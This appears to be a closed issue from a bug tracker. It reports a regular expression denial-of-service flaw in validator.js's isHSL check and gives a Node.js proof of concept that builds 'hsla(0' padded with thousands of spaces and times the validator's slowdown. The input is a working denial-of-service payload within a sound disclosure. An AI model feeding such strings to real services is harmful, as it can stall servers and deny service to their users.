Closed
Description
Describe the bug
validator.isHSL is vulnerable to Regular Expression Denial of Service (ReDoS) when it checks whether a crafted string is an HSL color.
Examples
var validator = require("validator")
/**
 * Builds the test input for the isHSL timing measurement: the prefix
 * "hsla(0", then `n` space characters, then a trailing "◎".
 *
 * @param {number} n - Number of spaces placed between the prefix and the
 *   trailing character.
 * @returns {string} The assembled string, of length n + 7 for a
 *   non-negative integer n.
 */
function build_attack(n) {
  const pieces = ["hsla(0"];
  // Counted loop keeps the same result for every n, including zero,
  // negative and non-numeric values (which add no spaces).
  for (let added = 0; added < n; added += 1) {
    pieces.push(" ");
  }
  pieces.push("◎");
  return pieces.join("");
}
// Timing harness: calls validator.isHSL on inputs padded with 1000, 2000,
// ... 50000 spaces and logs the wall-clock cost of each call, so the growth
// of matching time with input length can be read off the output.
for (let spaces = 1000; spaces <= 50000; spaces += 1000) {
  // The timer starts before the input is built, so each reported figure
  // also includes the string construction time.
  const startedAt = Date.now();
  const candidate = build_attack(spaces);
  validator.isHSL(candidate);
  const elapsedMs = Date.now() - startedAt;
  console.log(`attack_str.length: ${candidate.length}: ${elapsedMs} ms`);
}
Additional context
Validator.js version: 14.10.0
Node.js version:
OS platform: windows
profnandaa